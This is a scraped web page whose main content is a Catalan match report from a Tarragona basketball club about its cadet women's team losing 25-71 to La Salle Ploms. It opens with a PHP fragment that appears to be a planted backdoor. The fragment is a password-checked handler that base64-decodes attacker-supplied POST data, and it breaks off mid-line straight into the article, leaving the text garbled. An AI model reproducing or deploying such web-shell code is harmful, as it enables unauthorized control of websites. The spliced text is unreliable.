function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 2 fa un mal partit i perd contra la Salle Ploms (25-71) - Tgn Bàsquet Club -

El cadet femení 2 fa un mal partit i perd contra la Salle Ploms (25-71)

Updated: abril 27, 2016

El cadet femení 2 del TGN Bàsquet va fer un mal partit i va perdre amb la Salle Ploms de forma clara. El conjunt local va sortir prou bé, amb una bona defensa que va mantenir, però, un pírric resultat de 2-2 fins al minut 6. A partir d’aleshores, les visitants es van fer les ames del partit. Un parcial de 0-10 va decantar definitivament el matx cap el bàndol visitant.

Les coses no sortien de cap manera. Tot i estar en defensa en zona 2-3, el Ploms anotava fàcilment i, en atac, les locals perdien moltes pilotes i estaven imprecises. A mesura que passaven els minuts el panorama anava empitjorant i la derrota va ser inevitable.